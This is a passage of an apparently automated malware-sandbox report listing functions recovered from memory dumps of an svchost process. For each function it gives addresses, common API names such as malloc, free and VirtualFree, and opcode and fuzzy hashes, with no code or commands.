                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 10892065-0
                                                                                                                                        • Opcode ID: f69c4423fc2f9dc24249204a85e6f753c59304eed0840573d92f1e176759654c
                                                                                                                                        • Instruction ID: 643c827af968476de34ee3d2b5961e210c73ad71ac8dbab8d275977ae4d2ca0b
                                                                                                                                        • Opcode Fuzzy Hash: f69c4423fc2f9dc24249204a85e6f753c59304eed0840573d92f1e176759654c
                                                                                                                                        • Instruction Fuzzy Hash: CEF0A029E08D4C4AE714AA7A6CC426621A3AF84330F34857BD50BC2581E979C8C2D264
                                                                                                                                        Function 00007DF416F83424 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressCallerProc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2663294120-0
                                                                                                                                        • Opcode ID: b55f2987ccf9d47b878492792b43a4e8323f4fb48d1ec303df731e7bfe889620
                                                                                                                                        • Instruction ID: 10441b14348b1905923aedcde24853592b55670963d61da94488e45a08434792
                                                                                                                                        • Opcode Fuzzy Hash: b55f2987ccf9d47b878492792b43a4e8323f4fb48d1ec303df731e7bfe889620
                                                                                                                                        • Instruction Fuzzy Hash: F5E0C212B08C0D1BAB6861AE248D57755DADBDC132314027BE41DC32A9EC14CC824390
                                                                                                                                        Function 00007DF416FA0DCC Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FilePointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 973152223-0
                                                                                                                                        • Opcode ID: 4c721ddc8cb176db938021c85e5f400d5d7596dc62bee08ed1c2796866c985cb
                                                                                                                                        • Instruction ID: 185d46c588ea2e4567bcae6b34181abe55dfdcdb206542bcc00ac7c0aea2c954
                                                                                                                                        • Opcode Fuzzy Hash: 4c721ddc8cb176db938021c85e5f400d5d7596dc62bee08ed1c2796866c985cb
                                                                                                                                        • Instruction Fuzzy Hash: 93E0C232B191240BE72C6ABD2C8917A36CAC7CC572B06827BFC06C3284DC68CC5602D0
                                                                                                                                        Function 00007DF416F833F8 Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                        • Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                        • Instruction ID: c1fd7da6c99e194b3f550156cda387b809b68a6a51ad928116ab5885e7534d08
                                                                                                                                        • Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                        • Instruction Fuzzy Hash: FBD0A711724D0D1FEA48677D1C9576A51D9EBDC331F60017BF40EC2281F959CC554310
                                                                                                                                        Function 00007DF416F85BD3 Relevance: 1.4, APIs: 1, Instructions: 150COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 463b73a7625b3d26a85ced48e1f81300b36ced1bdd07cd3e50a3669595497c86
                                                                                                                                        • Instruction ID: 85cc9caa9eafb688e3a064ae00411876eb1e027f52c1755646c0753dea01d8be
                                                                                                                                        • Opcode Fuzzy Hash: 463b73a7625b3d26a85ced48e1f81300b36ced1bdd07cd3e50a3669595497c86
                                                                                                                                        • Instruction Fuzzy Hash: DF41613061CD4C8FDB94EF18C481A96B3E1FF99361F20466AD04EC7296EA34F881CB91
                                                                                                                                        Function 00007DF41704E880 Relevance: 1.4, APIs: 1, Instructions: 150COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • calloc.MSVCRT(?,?,?,?,0000414D,?,?,00007DF41704EB21,?,?,?,?,0010D940,?,?,00007DF416F993F8), ref: 00007DF41704E908
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: calloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2635317215-0
                                                                                                                                        • Opcode ID: 116888554fdc444eb3b31b19c2a321043db278ac29c98a48040ccefe69ec064d
                                                                                                                                        • Instruction ID: 693418caea07b14cd070dee47f2356bdf4835501fd5a124d15e2c178d827bf5c
                                                                                                                                        • Opcode Fuzzy Hash: 116888554fdc444eb3b31b19c2a321043db278ac29c98a48040ccefe69ec064d
                                                                                                                                        • Instruction Fuzzy Hash: A9513D31618E899BEB98EB24D4587E6B6A1FF68305F60813AD00FC25D2DF38B955C790
                                                                                                                                        Function 00007DF416F8DA74 Relevance: 1.4, APIs: 1, Instructions: 147COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00007DF416F9E150: NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,00007DF416F9C0F7), ref: 00007DF416F9E160
                                                                                                                                        • malloc.MSVCRT ref: 00007DF416F8DB44
                                                                                                                                          • Part of subcall function 00007DF416F977EC: malloc.MSVCRT(?,?,?,?,?,FFFFFFFF,-00000001,-00000002,-00000001,00007DF416FB740A), ref: 00007DF416F9780B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: malloc$AcceptConnectPort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1211516610-0
                                                                                                                                        • Opcode ID: 5565b0a7f35f124f6bcd3fbf3053ca4a01fc296d0f2770306c12d9fdd2224762
                                                                                                                                        • Instruction ID: 4daf5f49fbc6e36c62b6bd91504515be7f16b99cbb89e6b2ce4175f46665689d
                                                                                                                                        • Opcode Fuzzy Hash: 5565b0a7f35f124f6bcd3fbf3053ca4a01fc296d0f2770306c12d9fdd2224762
                                                                                                                                        • Instruction Fuzzy Hash: DE414D71608A4C8FDB64EF18D8857A677E5FF58311F10416AD84EC7291EB34E984CB92
                                                                                                                                        Function 00007DF416F97598 Relevance: 1.4, APIs: 1, Instructions: 139COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: malloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2803490479-0
                                                                                                                                        • Opcode ID: 07a9124dfceae028a3317908ae6002e6db3b01a657e18977bfda4f97c253f38a
                                                                                                                                        • Instruction ID: 8005d5694228eafa115ab9e6f38c053e73cf6edc0c4b254df05c0c03487d4342
                                                                                                                                        • Opcode Fuzzy Hash: 07a9124dfceae028a3317908ae6002e6db3b01a657e18977bfda4f97c253f38a
                                                                                                                                        • Instruction Fuzzy Hash: 60416331608E0E8FDB98EF2CD888AB5B7E1FB68315715466BD40AC3655DB34E885CBD0
                                                                                                                                        Function 00007DF416F74F54 Relevance: 1.4, APIs: 1, Instructions: 126COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: malloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2803490479-0
                                                                                                                                        • Opcode ID: 81c6eecad20e58c8d38abd6a23315df80df12776ef0665d00e4ffea17a923ccf
                                                                                                                                        • Instruction ID: dd80754470a8cb2f0e09ffe6362e5243e26f2a6e891473672897a7ec1e53cbaf
                                                                                                                                        • Opcode Fuzzy Hash: 81c6eecad20e58c8d38abd6a23315df80df12776ef0665d00e4ffea17a923ccf
                                                                                                                                        • Instruction Fuzzy Hash: 0831C230608E8E5FE758EA64D8499A6B3F4FF51360B20422AD81BC3591FF64F855C7D1
                                                                                                                                        Function 00007DF417039C4C Relevance: 1.4, APIs: 1, Instructions: 123COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: malloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2803490479-0
                                                                                                                                        • Opcode ID: fecab967ce68162db42977c85a03fdc32cd9cce0d0e8386cdf234f9e61cf8174
                                                                                                                                        • Instruction ID: c88dbb3088e22644976d3a0ef87acb93e39d7807abcb47c7feaec54150c175bf
                                                                                                                                        • Opcode Fuzzy Hash: fecab967ce68162db42977c85a03fdc32cd9cce0d0e8386cdf234f9e61cf8174
                                                                                                                                        • Instruction Fuzzy Hash: 04311C2092CF494FE7589B2CA50A3A27BE5FF56354F24817AD44FC7283DB18E84687A4
                                                                                                                                        Function 00007DF41704EA54 Relevance: 1.4, APIs: 1, Instructions: 119COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: calloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2635317215-0
                                                                                                                                        • Opcode ID: 846e1ff395a9a0e97b589690a9bc8b88936b2e8aac8a799f01e9c267aa4d71c2
                                                                                                                                        • Instruction ID: f46c40828a063853457831cf67287b0e8dac18907dee179f018888f136502fb4
                                                                                                                                        • Opcode Fuzzy Hash: 846e1ff395a9a0e97b589690a9bc8b88936b2e8aac8a799f01e9c267aa4d71c2
                                                                                                                                        • Instruction Fuzzy Hash: 7C41AB70908A188EDB91DF18D4847D57AE1FB68701F2842BBDC4DCF25ADB749885CBA1
                                                                                                                                        Function 00007DF416F977EC Relevance: 1.3, APIs: 1, Instructions: 91COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • malloc.MSVCRT(?,?,?,?,?,FFFFFFFF,-00000001,-00000002,-00000001,00007DF416FB740A), ref: 00007DF416F9780B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: malloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2803490479-0
                                                                                                                                        • Opcode ID: f31908e5917b62f5e8fcfc63ea224ee910f3ac586d2aa649c3aaf2b7337a1fee
                                                                                                                                        • Instruction ID: 2e4c12fea90752d0461c715dd8ca9f408457867ef6df5d9d29c1c2266dc7d6fb
                                                                                                                                        • Opcode Fuzzy Hash: f31908e5917b62f5e8fcfc63ea224ee910f3ac586d2aa649c3aaf2b7337a1fee
                                                                                                                                        • Instruction Fuzzy Hash: D121A531614E1C8FDB58EF1CD88CBB177E1EB6831171441A7D80ECB255DA35E885CB91
                                                                                                                                        Function 00007DF41706CB9C Relevance: 1.3, APIs: 1, Instructions: 89COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 472e16019ba601094a4c2923f039f601fa415deb3ae2891c44a4e6fa2e872d25
                                                                                                                                        • Instruction ID: ce0ddfa5c6be4e93854cc8c31856751792317135fe2df0bf35d1113a5b43fcd8
                                                                                                                                        • Opcode Fuzzy Hash: 472e16019ba601094a4c2923f039f601fa415deb3ae2891c44a4e6fa2e872d25
                                                                                                                                        • Instruction Fuzzy Hash: 32214F30E08D584FDEA4EA1CD0E895A7BE1EBA8360B7552A2E81ED7199D525FC80C790
                                                                                                                                        Function 00007DF416F8E560 Relevance: 1.3, APIs: 1, Instructions: 81COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 24d45a3551a768b3090c567df57a9186389bc8119604ba08ac45f82736c76157
                                                                                                                                        • Instruction ID: 4150633d0ef9e1f84c5c100ce4c8a61ee8a0a3180e164273176fb4222e2790d6
                                                                                                                                        • Opcode Fuzzy Hash: 24d45a3551a768b3090c567df57a9186389bc8119604ba08ac45f82736c76157
                                                                                                                                        • Instruction Fuzzy Hash: 5621D230618F0C4FEB48EF58D8895B677E4FB99321B10426EE44EC3261EA74E845C7D1
                                                                                                                                        Function 00007DF416F951A0 Relevance: 1.3, APIs: 1, Instructions: 80COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: calloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2635317215-0
                                                                                                                                        • Opcode ID: f9d8d64e7c2c4c7956bd9358d16aebce3c9b4a36e71dd88cc3658fe52e189f83
                                                                                                                                        • Instruction ID: ab8d76bdc877a8102d9775a75f243f3fa6fd017e97400b077532f9fb99ca18e9
                                                                                                                                        • Opcode Fuzzy Hash: f9d8d64e7c2c4c7956bd9358d16aebce3c9b4a36e71dd88cc3658fe52e189f83
                                                                                                                                        • Instruction Fuzzy Hash: E6216631618E4C4FEB54EF28C8C479673E5FB98320F5441B6980ECB29ADE34D945CB90
                                                                                                                                        Function 00007DF416F831B4 Relevance: 1.3, APIs: 1, Instructions: 71stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmpi
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1586166983-0
                                                                                                                                        • Opcode ID: 66b33f43179977e6021ab23a99b744e2774dbd865e09dbf7877d2203174fb5a6
                                                                                                                                        • Instruction ID: e0bce1fdb9246e3d6555ec6c09d56a3f218dfe3b0c6bd0a4ff098ba4979949ee
                                                                                                                                        • Opcode Fuzzy Hash: 66b33f43179977e6021ab23a99b744e2774dbd865e09dbf7877d2203174fb5a6
                                                                                                                                        • Instruction Fuzzy Hash: D2117531B44D4C4BEB98D7A8985936736E5EF94220B2442BBD80FC2576FD2CD904D760
                                                                                                                                        Function 00007DF416F8C868 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: a647a70f472eec1f0232b607393523916aff4e703a7abd28a79881bfecac5ea9
                                                                                                                                        • Instruction ID: 036f905896dded8a36dcc2936a749b7bfe460a1e3bf22a1c1c16a48f6d19f404
                                                                                                                                        • Opcode Fuzzy Hash: a647a70f472eec1f0232b607393523916aff4e703a7abd28a79881bfecac5ea9
                                                                                                                                        • Instruction Fuzzy Hash: E801A831648D4C8FDF88EB18C4C8E5573E5EBA831472445A6D50DCB249DA35E886CB50
                                                                                                                                        Function 00007DF416F7272C Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                        • Opcode ID: 352c65fe592b7790d915c399a828791dec36a0441c5dd9355c9a9937d9e241a1
                                                                                                                                        • Instruction ID: 112f6a647e978ce03661c98b3c293051ef2bc76c3254ab6e4d28817ced20a201
                                                                                                                                        • Opcode Fuzzy Hash: 352c65fe592b7790d915c399a828791dec36a0441c5dd9355c9a9937d9e241a1
                                                                                                                                        • Instruction Fuzzy Hash: 8D016234A18E4E8BDB98DB2C880462632E1FB5C325764C13ED00EC72D0E639D843C751
                                                                                                                                        Function 00007DF416F74090 Relevance: 1.3, APIs: 1, Instructions: 40COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: calloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2635317215-0
                                                                                                                                        • Opcode ID: de320a19c5c687e61a4a128f89672fe303437e4185c336a85925eb16b6c1a1ac
                                                                                                                                        • Instruction ID: 019be0e095e924ab32f84c70cf90138ed1978d8befa79fd5efe4e8ae3ce039d1
                                                                                                                                        • Opcode Fuzzy Hash: de320a19c5c687e61a4a128f89672fe303437e4185c336a85925eb16b6c1a1ac
                                                                                                                                        • Instruction Fuzzy Hash: A8F05E30614D0E4FF784AB28989CB7676E4FF98351FA4407AD90AC62A0EE78CC95D750
                                                                                                                                        Function 00007DF416FD3A10 Relevance: 1.3, APIs: 1, Instructions: 40COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: ceb1b3ac1685b1e70d1ec6c741c6d46ebc4cdc23072f6723e1ceb22e799d32bf
                                                                                                                                        • Instruction ID: 5f2c8d55c11dd4047fa73e534dc6138a93703bd45527e4c62d0d61b431975d59
                                                                                                                                        • Opcode Fuzzy Hash: ceb1b3ac1685b1e70d1ec6c741c6d46ebc4cdc23072f6723e1ceb22e799d32bf
                                                                                                                                        • Instruction Fuzzy Hash: 78F01D7561BD4ECBFF58AB6598A822577A0EF14312B14002AE80BC11A0DA6CE454D722
                                                                                                                                        Function 00000155E72D19B4 Relevance: 1.3, APIs: 1, Instructions: 40COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 80 155e72d19b4-155e72d19d1 82 155e72d19d3-155e72d19da 80->82 83 155e72d19dd-155e72d19e4 80->83 82->83 84 155e72d19fb-155e72d1a09 83->84 85 155e72d19e6-155e72d19f9 VirtualFree 83->85 85->84
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000002.3234182550.00000155E72D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000155E72D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_2_155e72d0000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                        • Opcode ID: 35bf1a61f723f2ebe461f85329f49c45ff48ebd9128404ff90ab1984f0afa418
                                                                                                                                        • Instruction ID: 48ad4713e08d187b7a451ce08d19233fec3180a3774a9d64c33670e8640bb649
                                                                                                                                        • Opcode Fuzzy Hash: 35bf1a61f723f2ebe461f85329f49c45ff48ebd9128404ff90ab1984f0afa418
                                                                                                                                        • Instruction Fuzzy Hash: C3F01D71154A098BDF5CEE95C8D5AE133A6FB28301F0401798D0ACF196DA21E941C751
                                                                                                                                        Function 00007DF416FA0FC4 Relevance: 1.3, APIs: 1, Instructions: 26COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: malloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2803490479-0
                                                                                                                                        • Opcode ID: 803f3e239e71c094a11688905a13a5b4d70b1f6a51e1afa360838daebce55db3
                                                                                                                                        • Instruction ID: af4f740f3b72b5b0f32470c70e5ee9e82d732c177fd4ed30d5e8a10eb886ac5d
                                                                                                                                        • Opcode Fuzzy Hash: 803f3e239e71c094a11688905a13a5b4d70b1f6a51e1afa360838daebce55db3
                                                                                                                                        • Instruction Fuzzy Hash: 3BD05E51B1AD0D0FAB58627E1C8D56A21D5DBD81727580137B80DC2251FC19CC859270
                                                                                                                                        Function 00007DF416F740EC Relevance: 1.3, APIs: 1, Instructions: 21COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 18e477c43355e40e63571de48535b83294ddf8e770562ea63db4867f7ce24bd4
                                                                                                                                        • Instruction ID: 1cba4775ec9e492ee6cd5faad65063e17111c5643d0b50600afd7802f2067f3b
                                                                                                                                        • Opcode Fuzzy Hash: 18e477c43355e40e63571de48535b83294ddf8e770562ea63db4867f7ce24bd4
                                                                                                                                        • Instruction Fuzzy Hash: 5ED0A73060BD0F0BFF9DBBAA54A963532E0DF78352720003DD40BC1991DE59C851D710
                                                                                                                                        Function 00007DF416F74D90 Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 3ab7e135269a5abfd494e29a849e8a7504a641c2ba0334102f1d09b8f57cd51c
                                                                                                                                        • Instruction ID: 62d256213231b21c3bf9a7096e4b64999471937894310fbaeed8da425d43dc85
                                                                                                                                        • Opcode Fuzzy Hash: 3ab7e135269a5abfd494e29a849e8a7504a641c2ba0334102f1d09b8f57cd51c
                                                                                                                                        • Instruction Fuzzy Hash: D9B0122881BCEF02EE5C33B74C5A06A3460EF04311FC40019E817C0450F70CC094C356

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 00007DF416FA1741 Relevance: .0, Instructions: 9COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000017.00000003.3232118622.00007DF416F71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF416F71000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_23_3_7df416f71000_svchost.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b5b40462eea7a53d4f43fef84958c55854cf61dddd4c725374532822cf4ebc6c
                                                                                                                                        • Instruction ID: 6b5de7765083f1fcecf79d76d96fc317e58b19ab22377307484a88b0d29399c3
                                                                                                                                        • Opcode Fuzzy Hash: b5b40462eea7a53d4f43fef84958c55854cf61dddd4c725374532822cf4ebc6c
                                                                                                                                        • Instruction Fuzzy Hash: B4B01122E2880082C2080E0AB802330F2B2C30B300F003030200AF3A20C8A0CC802ACF
                                                                                                                                        Function 00000155E72D0511 Relevance: .0, Instructions: 9COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
